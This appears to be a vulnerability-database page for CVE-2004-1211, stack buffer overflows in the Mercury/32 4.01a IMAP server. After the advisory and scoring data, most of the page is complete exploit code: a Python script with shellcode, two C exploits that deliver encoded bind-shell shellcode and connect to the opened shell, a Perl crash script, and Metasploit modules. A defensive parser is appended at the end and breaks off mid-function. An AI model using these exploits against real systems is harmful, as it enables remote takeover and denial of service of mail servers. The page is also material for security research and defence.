CVE-2004-1211
CVSS 10.0
Published: 2005-01-10 00:00:00
Last revised: 2016-10-17 22:52:28

[Original] Multiple buffer overflows in the IMAP service in Mercury/32 4.01a allow remote authenticated users to cause a denial of service (application crash) and possibly execute arbitrary code via long arguments to the (1) EXAMINE, (2) SUBSCRIBE, (3) STATUS, (4) APPEND, (5) CHECK, (6) CLOSE, (7) EXPUNGE, (8) FETCH, (9) RENAME, (10) DELETE, (11) LIST, (12) SEARCH, (13) CREATE, or (14) UNSUBSCRIBE commands.


[CNNVD] PegasusMail Mercury/32 IMAP Buffer Overflow Vulnerability (CNNVD-200501-130)

Mercury Mail Transport System is a mail transport system.
The IMAP service in Mercury 4.01a contains multiple buffer overflow vulnerabilities.
A remote authenticated user can supply overlong arguments to a number of commands (including EXAMINE, SUBSCRIBE, STATUS, APPEND, CHECK, CLOSE, EXPUNGE, FETCH, RENAME, DELETE, LIST, SEARCH, CREATE and UNSUBSCRIBE) to trigger an overflow, crashing the program or executing arbitrary code.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in total system shutdown]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: NETWORK [the attacker does not need intranet or local access]
Authentication: NONE [no authentication required to exploit]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1211
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1211
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-130
(Official data source) CNNVD

- Other links and resources

http://home.kabelfoon.nl/~jaabogae/han/m_401b.html
(UNKNOWN)  CONFIRM  http://home.kabelfoon.nl/~jaabogae/han/m_401b.html
http://lists.grok.org.uk/pipermail/full-disclosure/2004-December/029701.html
(UNKNOWN)  FULLDISC  20041201 Multiple buffer overflows exist in Mercury/32, v4.01a, Dec 8 2003.
http://marc.info/?l=bugtraq&m=110193702909991&w=2
(UNKNOWN)  BUGTRAQ  20041201 Multiple buffer overflows exist in Mercury/32, v4.01a, Dec 8 2003.
http://www.securityfocus.com/bid/11775
(VENDOR_ADVISORY)  BID  11775
http://xforce.iss.net/xforce/xfdb/18318
(VENDOR_ADVISORY)  XF  mercury-command-bo(18318)

- Vulnerability information

PegasusMail Mercury/32 IMAP Buffer Overflow Vulnerability
Critical  Buffer overflow
2005-01-10 00:00:00 2005-10-20 00:00:00
Remote
Mercury Mail Transport System is a mail transport system.
The IMAP service in Mercury 4.01a contains multiple buffer overflow vulnerabilities.
A remote authenticated user can supply overlong arguments to a number of commands (including EXAMINE, SUBSCRIBE, STATUS, APPEND, CHECK, CLOSE, EXPUNGE, FETCH, RENAME, DELETE, LIST, SEARCH, CREATE and UNSUBSCRIBE) to trigger an overflow, crashing the program or executing arbitrary code.

- Advisory and patch

The vendor has released an upgrade patch to fix this security issue; the patch is available from:
http://www.pmail.com/downloads_s3_t.htm

- Vulnerability information (663)

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (EDBID:663)
windows remote
2004-11-29 Verified
143 muts
N/A
#########################################################
#                                                       #
# Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow     	#
# Discovered by : Muts                                  #
# Coded by : Muts                                       #
# WWW.WHITEHAT.CO.IL                                    #
# Plain vanilla stack overflow in the SELECT command  	#
#                                                       #
#########################################################


import struct
import socket
from time import sleep

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Lame calc.exe shellcode - dont expect miracles!

sc2 = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
sc2 += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
sc2 += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
sc2 += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb4\x48\x3a\x75\xd1\x4d\x4e"
sc2 += "\x88\x0e\xbc\x1d\x4c\xdf\x08\xb6\xb5\xf0\x71\xb0\xb3\xd4\x8e\x8a"
sc2 += "\x08\x1b\x68\xc4\x95\xb4\x26\x95\x75\xd4\x1a\x3a\x78\x74\xf7\xeb"
sc2 += "\x68\x3e\x97\x3a\x70\xb4\x7d\x59\x9f\x3d\x4d\x71\x2b\x61\x21\xea"
sc2 += "\xb6\x37\x7c\xef\x1e\x0f\x25\xd5\xff\x26\xf7\xea\x78\xb4\x27\xad"
sc2 += "\xff\x24\xf7\xea\x7c\x6c\x14\x3f\x3a\x31\x90\x4e\xa2\xb6\xbb\x5a"
sc2 += "\x6c\x6c\x14\x29\x8a\xb5\x72\x4e\xa2\xc0\xac\xe2\x1c\xcf\xf6\xb5"
sc2 += "\x2b\xc0\xaa\xdb\x74\xc0\xac\x4e\xa4\x55\x7c\x59\x95\xc0\x83\x4e"
sc2 += "\x17\x5e\x10\xd2\x5a\x5a\x04\xd4\x74\x3f\x7c"

#Change RET Address as needed
buffer = '\x41'*260 +  struct.pack('<L', 0x782f28f7)+ '\x90'*32+sc2

print "\nSending evil buffer..."
s.connect(('192.168.1.167',143))
s.send('a001 LOGIN ftp ftp' + '\r\n')
data = s.recv(1024)
sleep(3)
s.send('A001 SELECT ' + buffer+'\r\n')
data = s.recv(1024)
s.close()
print "\nDone! "

# milw0rm.com [2004-11-29]

- Vulnerability information (668)

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (c code) (EDBID:668)
windows remote
2004-11-30 Verified
143 JohnH
N/A
/*  whitehat.co.il comments removed do to muts love */

/** Remote Mercury32 Imap exploit
 ** By: JohnH@secnetops.com
 **/

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>

#define version         "1.0"
int usage(char *p);


char sc_bind[] =
    //decoder
    "\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
    "\x05\xE8\xEC\xFF\xFF\xFF"
    //sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
    //XOR with 0x96 (267 0x10B bytes)
    "\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
    "\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
    "\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
    "\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
    "\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
    "\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
    "\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
    "\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
    "\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
    "\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
    "\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
    "\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
    "\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
    "\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
    "\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
    "\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
    //decoder end sign
    "\x45\x59\x34\x53";

int             iType;
int             iPort=143;
char    *ip=NULL;
char    username[256];
char    password[256];

int main(int argc, char **argv)
{
    int             c;


    if(argc < 2)
    {
        usage(argv[0]);
        return 0;
    }


    while((c = getopt(argc, argv, "u:P:h:p:")) != EOF) {
        switch(c) {

        case 'u':
            strncpy(username, optarg, sizeof (username) - 1);
            break;

        case 'P':
            strncpy(password, optarg, sizeof (password) - 1);
            break;

        case 'h':
            ip=optarg;
            break;
        case 'p':
            iPort=atoi(optarg);
            break;
        default:
            usage (argv[0]);
            return 0;
        }
    }


    if((!ip))
    {
        usage(argv[0]);
        printf("[-] Invalid parameter.\n");
        return 0;
    }

    SendExploit();
    return 0;
}

/* ripped from TESO code */
void shell (int sock)
{
    int     l;
    char    buf[512];
    fd_set  rfds;


    while (1) {
        FD_SET (0, &rfds);
        FD_SET (sock, &rfds);
        select (sock + 1, &rfds, NULL, NULL, NULL);
        if (FD_ISSET (0, &rfds)) {
            l = read (0, buf, sizeof (buf));
            if (l <= 0) {
                printf("\n - Connection closed by local user\n");
                exit (EXIT_FAILURE);
            }
            write (sock, buf, l);
        }

        if (FD_ISSET (sock, &rfds)) {
            l = read (sock, buf, sizeof (buf));
            if (l == 0) {
                printf ("\n - Connection closed by remote host.\n");
                exit (EXIT_FAILURE);
            } else if (l < 0) {
                printf ("\n - Read failure\n");
                exit (EXIT_FAILURE);
            }
            write (1, buf, l);
        }
    }
}

int     SendExploit()
{
    struct hostent *he;
    struct in_addr in;
    struct sockaddr_in peer;
    int             iErr, s,s2;
    int x;
    char    buffer[9000];
    char    buffer2[9000];
    char    szRecvBuff[0x1000];
    char *ip2=NULL;

    printf( "MERCURY32 Imap exploit\n");
    printf( "By: JohnH@secnetops.com\n");
    printf("[+] Entering God Mode\n");

    // Login
    memset(buffer2,0x0,sizeof(buffer2));
    strcat(buffer2,"a001 LOGIN ");
    strcat(buffer2,username);
    strcat(buffer2," ");
    strcat(buffer2,password);
    strcat(buffer2,"\n");

    bzero  (buffer,sizeof(buffer));
    strcat(buffer,"a001 SELECT ");
    x = strlen(buffer);
    memset(buffer+x,0x41,260);
    x+=260;
    *(unsigned int *)&buffer[x] = 0x01f9c8fa;
    x+=4;
    memset(buffer+x,0x90,100);
    x+=100;
    memcpy (buffer+x, sc_bind, strlen(sc_bind));
    x+=strlen(sc_bind);
    memcpy(buffer+x,"\r\n",2);
    x+=2;


    if (!(he = gethostbyname(ip)))
    {
        herror("Resolving host");
        exit(EXIT_FAILURE);
    }
    in.s_addr = *((unsigned int *)he->h_addr);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(iPort);
    peer.sin_addr.s_addr = inet_addr(ip);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
    {
        perror("socket");
        return(0);
    }
    if (connect(s, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)

    {
        perror("connect");
        return(0);
    }
    printf("[+] connect to %s:%d success.\n", ip, iPort);
    sleep(3);

    memset(szRecvBuff, 0, sizeof(szRecvBuff));
    iErr = send(s, buffer2, strlen(buffer2),0);
    printf("[+] Sent: %d\n", iErr);

    iErr = send(s, buffer, x,0);

    printf("[+] Sent: %d\n", iErr);

    printf("[+] Wait for shell.\n");
    if (!(he = gethostbyname(ip)))
    {
        herror("Resolving host");
        exit(EXIT_FAILURE);
    }
    in.s_addr = *((unsigned int *)he->h_addr);
    ip2 = in.s_addr;

    sleep(5);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(1981);
    peer.sin_addr.s_addr = ip2;
    s2 = socket(AF_INET, SOCK_STREAM, 0);
    if (s2 < 0)
    {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    if (connect(s2, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
    {
        perror("connect");
        return(0);
    }
    printf ("[+] We got a shell \n");

    shell(s2);


    return 0;

}

int usage(char *p)
{
    printf("MERCURY32 Imap Remote Exploit\n");
    printf("By: JohnH@secnetops.com\n");
    printf( "Usage: %s <-u username> <-p password> <-h host> <-p port>\n",p);
    exit(0);
}

// milw0rm.com [2004-11-30]

- Vulnerability information (670)

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow v2 (c code) (EDBID:670)
windows remote
2004-12-01 Verified
143 JohnH
N/A
/** Remote Mercury32 Imap exploit [14 types of attacks] WOW!
 ** By: JohnH@secnetops.com
 **
 ** Notes: Second public release and both of them are murcury32 ;) 
 **        Again someone posted some dos code :( why bother?
 **        If you spent the time to look, it uses the same buffer for all 14 types of attacks and the size does not 
 **        change. I did not check the asm but its prob using the same routine for all 14 commands.
 **
 ** Date: 12/01/04
 **/

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>

#define version         "1.0"
int usage(char *p);


char sc_bind[] =
    //decoder
    "\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
    "\x05\xE8\xEC\xFF\xFF\xFF"
    //sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
    //XOR with 0x96 (267 0x10B bytes)
    "\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
    "\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
    "\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
    "\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
    "\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
    "\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
    "\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
    "\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
    "\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
    "\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
    "\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
    "\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
    "\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
    "\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
    "\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
    "\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
    //decoder end sign
    "\x45\x59\x34\x53";

int             type;
int             iPort=143;
char    *ip=NULL;
char    username[256];
char    password[256];

int main(int argc, char **argv)
{
    int             c;


    if(argc < 2)
    {
        usage(argv[0]);
        return 0;
    }


    while((c = getopt(argc, argv, "u:P:h:p:t:")) != EOF) {
        switch(c) {

        case 'u':
            strncpy(username, optarg, sizeof (username) - 1);
            break;

        case 'P':
            strncpy(password, optarg, sizeof (password) - 1);
            break;

        case 'h':
            ip=optarg;
            break;
        case 'p':
            iPort=atoi(optarg);
            break;
        case 't':
	    type=atoi(optarg);
	    break;
	default:
            usage (argv[0]);
            return 0;
        }
    }


    if((!ip))
    {
        usage(argv[0]);
        printf("[-] Invalid parameter.\n");
        return 0;
    }

    SendExploit();
    return 0;
}

/* ripped from TESO code */
void shell (int sock)
{
    int     l;
    char    buf[512];
    fd_set  rfds;


    while (1) {
        FD_SET (0, &rfds);
        FD_SET (sock, &rfds);
        select (sock + 1, &rfds, NULL, NULL, NULL);
        if (FD_ISSET (0, &rfds)) {
            l = read (0, buf, sizeof (buf));
            if (l <= 0) {
                printf("\n - Connection closed by local user\n");
                exit (EXIT_FAILURE);
            }
            write (sock, buf, l);
        }

        if (FD_ISSET (sock, &rfds)) {
            l = read (sock, buf, sizeof (buf));
            if (l == 0) {
                printf ("\n - Connection closed by remote host.\n");
                exit (EXIT_FAILURE);
            } else if (l < 0) {
                printf ("\n - Read failure\n");
                exit (EXIT_FAILURE);
            }
            write (1, buf, l);
        }
    }
}

int     SendExploit()
{
    struct hostent *he;
    struct in_addr in;
    struct sockaddr_in peer;
    int             iErr, s,s2;
    int x;
    char    buffer[9000];
    char    buffer2[9000];
    char    szRecvBuff[0x1000];
    char *ip2=NULL;

    printf( "MERCURY32 Imap exploit\n");
    printf( "By: JohnH@secnetops.com\n");
    printf("[+] Entering God Mode\n");

    // Login
    memset(buffer2,0x0,sizeof(buffer2));
    strcat(buffer2,"a001 LOGIN ");
    strcat(buffer2,username);
    strcat(buffer2," ");
    strcat(buffer2,password);
    strcat(buffer2,"\n");

    bzero  (buffer,sizeof(buffer));
    printf("[+] Using type: %d\n",type);
    if (type == 0)
          strcat(buffer,"a001 EXAMINE ");
    else if(type == 1)
	   strcat(buffer,"a001 SUBSCRIBE ");
    else if(type == 2)
	   strcat(buffer,"a001 STATUS ");
    else if(type == 3)
            strcat(buffer,"a001 APPEND ");
    else if(type == 4)
            strcat(buffer,"a001 CHECK ");
    else if(type == 5)
            strcat(buffer,"a001 CLOSE ");
    else if(type == 6)
            strcat(buffer,"a001 EXPUNGE ");
    else if(type == 7)
            strcat(buffer,"a001 FETCH ");
    else if(type == 8)
            strcat(buffer,"a001 RENAME ");
    else if(type == 9)
            strcat(buffer,"a001 DELETE ");
    else if(type == 10)
            strcat(buffer,"a001 LIST ");
    else if(type == 11)
            strcat(buffer,"a001 SEARCH ");
    else if(type == 12)
	    strcat(buffer,"a001 CREATE ");
    else if(type == 13)
            strcat(buffer,"a001 UNSUBSCRIBE ");
    else if(type == 14)
	    strcat(buffer,"a001 SELECT ");



    x = strlen(buffer);
    memset(buffer+x,0x41,260);
    x+=260;
    *(unsigned int *)&buffer[x] = 0x01f9c8fa;
    x+=4;
    memset(buffer+x,0x90,100);
    x+=100;
    memcpy (buffer+x, sc_bind, strlen(sc_bind));
    x+=strlen(sc_bind);
    memcpy(buffer+x,"\r\n",2);
    x+=2;


    if (!(he = gethostbyname(ip)))
    {
        herror("Resolving host");
        exit(EXIT_FAILURE);
    }
    in.s_addr = *((unsigned int *)he->h_addr);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(iPort);
    peer.sin_addr.s_addr = inet_addr(ip);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
    {
        perror("socket");
        return(0);
    }
    if (connect(s, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)

    {
        perror("connect");
        return(0);
    }
    printf("[+] connect to %s:%d success.\n", ip, iPort);
    sleep(3);

    memset(szRecvBuff, 0, sizeof(szRecvBuff));
    iErr = send(s, buffer2, strlen(buffer2),0);
    printf("[+] Sent: %d\n", iErr);

    iErr = send(s, buffer, x,0);

    printf("[+] Sent: %d\n", iErr);

    printf("[+] Wait for shell.\n");
    if (!(he = gethostbyname(ip)))
    {
        herror("Resolving host");
        exit(EXIT_FAILURE);
    }
    in.s_addr = *((unsigned int *)he->h_addr);
    ip2 = in.s_addr;

    sleep(5);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(1981);
    peer.sin_addr.s_addr = ip2;
    s2 = socket(AF_INET, SOCK_STREAM, 0);
    if (s2 < 0)
    {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    if (connect(s2, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
    {
        perror("connect");
        return(0);
    }
    printf ("[+] We got a shell \n");

    shell(s2);


    return 0;

}

int usage(char *p)
{
    printf("MERCURY32 Imap Remote Exploit\n");
    printf("By: JohnH@secnetops.com\n");
    printf( "Usage: %s <-u username> <-p password> <-h host> <-p port> <-t type>\n",p);
    printf("Possible types: Look in source code too lazy to type out 14 types\n");
    exit(0);
}

// milw0rm.com [2004-12-01]

- Vulnerability information (1159)

Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit (EDBID:1159)
windows dos
2004-12-01 Verified
0 Reed Arvin
N/A
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl <ip> <imap4 user> <imap4 pass>
#        Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
        print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";

        sleep(1);

        print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";

        sleep(1);

        print $socket "0001 CHECK " . "A" x 512 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====

# milw0rm.com [2004-12-01]

- Vulnerability information (16484)

Mercury/32 v4.01a IMAP RENAME Buffer Overflow (EDBID:16484)
windows remote
2010-05-09 Verified
0 metasploit
N/A
##
# $Id: mercury_rename.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow vulnerability in the
				Mercury/32 v.4.01a IMAP service.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2004-1211'],
					[ 'OSVDB', '12508'],
					[ 'BID', '11775'],
					[ 'NSS', '15867'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP4 English',   { 'Ret' => 0x7846107b }],
					['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }],
					['Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 }],
				],
			'DisclosureDate' => 'Nov 29 2004'))
	end

	def check
		connect
		resp = sock.get_once
		disconnect

		if (resp =~ /Mercury\/32 v4\.01a/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login

		sploit =  "a001 RENAME " + rand_text_alpha_upper(260)
		sploit << [target.ret].pack('V') + payload.encoded

		sock.put(sploit)

		handler
		disconnect
	end

end

- Vulnerability information (F83124)

Mercury/32 v4.01a IMAP RENAME Buffer Overflow (PacketStormID:F83124)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,imap
CVE-2004-1211

This Metasploit module exploits a stack overflow vulnerability in the Mercury/32 v.4.01a IMAP service.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow vulnerability in the
				Mercury/32 v.4.01a IMAP service.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-1211'],
					[ 'OSVDB', '12508'],
					[ 'BID', '11775'],
					[ 'NSS', '15867'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 SP4 English',   { 'Ret' => 0x7846107b }],
					['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }],
					['Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 }],
				],
			'DisclosureDate' => 'Nov 29 2004'))
	end

	def check
		connect
		resp = sock.get_once
		disconnect

		if (resp =~ /Mercury\/32 v4\.01a/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login

		sploit =  "a001 RENAME " + rand_text_alpha_upper(260)
		sploit << [target.ret].pack('V') + payload.encoded 

		sock.put(sploit)
		
		handler
		disconnect
	end

end

- Vulnerability information

12508
Mercury Mail Transport System IMAP Server Multiple Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Uncoordinated Disclosure

- Vulnerability description

A buffer overflow exists in Mercury Mail. The IMAP server fails to validate input passed to the EXAMINE, SUBSCRIBE, STATUS, APPEND, CHECK, CLOSE, EXPUNGE, FETCH, RENAME, DELETE, LIST, SEARCH, CREATE, and UNSUBSCRIBE commands resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2004-11-29 Unknown
2004-12-01 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, David Harris has released a patch to address this vulnerability.

- Vulnerability information

Mercury Mail Multiple Remote IMAP Stack Buffer Overflow Vulnerabilities
Boundary Condition Error 11775
Yes No
2004-11-29 12:00:00 2007-03-26 07:53:00
Muts disclosed this vulnerability. Further disclosure was provided by Reed Arvin <reedarvin@gmail.com>.

- Affected program versions

David Harris Mercury (win32 version) 4.0 1a
David Harris Mercury (win32 version) 4.0 1
David Harris Mercury (win32 version) 4.0 1b

- Unaffected program versions

David Harris Mercury (win32 version) 4.0 1b

- Vulnerability discussion

Mercury Mail is reported susceptible to multiple stack-based buffer-overflow vulnerabilities in its IMAP server implementation. These issues are due to the application's failure to properly bounds-check user-supplied input before copying it to a finite-sized memory buffer.

Exploiting these vulnerabilities allows authenticated, remote attackers to execute arbitrary machine code in the context of the affected server process.

Versions prior to 4.01a of Mercury Mail are reported affected by these vulnerabilities; other versions may also be affected.

Note: BID 11788 has been consolidated with this BID; they actually represent the same issues.
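The discussion above describes the root cause as an unbounded copy of a command argument into a fixed-size stack buffer. The following parser is an added defensive illustration, not code from this page, from Mercury/32 or from any of the exploit authors: it parses an IMAP command line of the shape the advisory describes and refuses, rather than truncates or overflows on, an argument that does not fit its buffer. The 255-byte argument limit, the 4096-byte line buffer, the fixed `0001` tag in the constructed input, and the command table (the 14 commands named in the advisory plus SELECT from the first exploit; a real server accepts more) are all assumptions made for this example.

```c
/* Bounds-checked IMAP command-line parser (added example, not Mercury/32 code).
 * The CWE-119 defect described on this page is an unbounded copy of a command
 * argument into a fixed-size stack buffer. Every copy here goes through
 * copy_bounded(), which refuses data that would not fit. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAX_ARG_LEN  255    /* assumed argument limit for this example, not Mercury's */
#define MAX_LINE_LEN 4096   /* assumed line buffer size for constructed input */

enum imap_parse_result {
    IMAP_OK = 0,
    IMAP_ERR_SYNTAX,
    IMAP_ERR_UNKNOWN_COMMAND,
    IMAP_ERR_ARG_TOO_LONG
};

struct imap_command {
    char tag[32];
    char name[16];              /* UNSUBSCRIBE, the longest known name, is 11 chars */
    char arg[MAX_ARG_LEN + 1];
};

/* The commands the advisory names, plus SELECT from the first exploit.
 * Assumption: a real IMAP server knows many more; the table is only as wide
 * as this page. */
static const char *const known_commands[] = {
    "EXAMINE", "SUBSCRIBE", "STATUS", "APPEND", "CHECK", "CLOSE", "EXPUNGE",
    "FETCH", "RENAME", "DELETE", "LIST", "SEARCH", "CREATE", "UNSUBSCRIBE",
    "SELECT"
};

/* Copy len bytes of src into dst (capacity dst_size) and NUL-terminate.
 * Returns 0 without writing anything when the data would not fit; this is
 * the single check the vulnerable pattern lacks. */
static int copy_bounded(char *dst, size_t dst_size, const char *src, size_t len)
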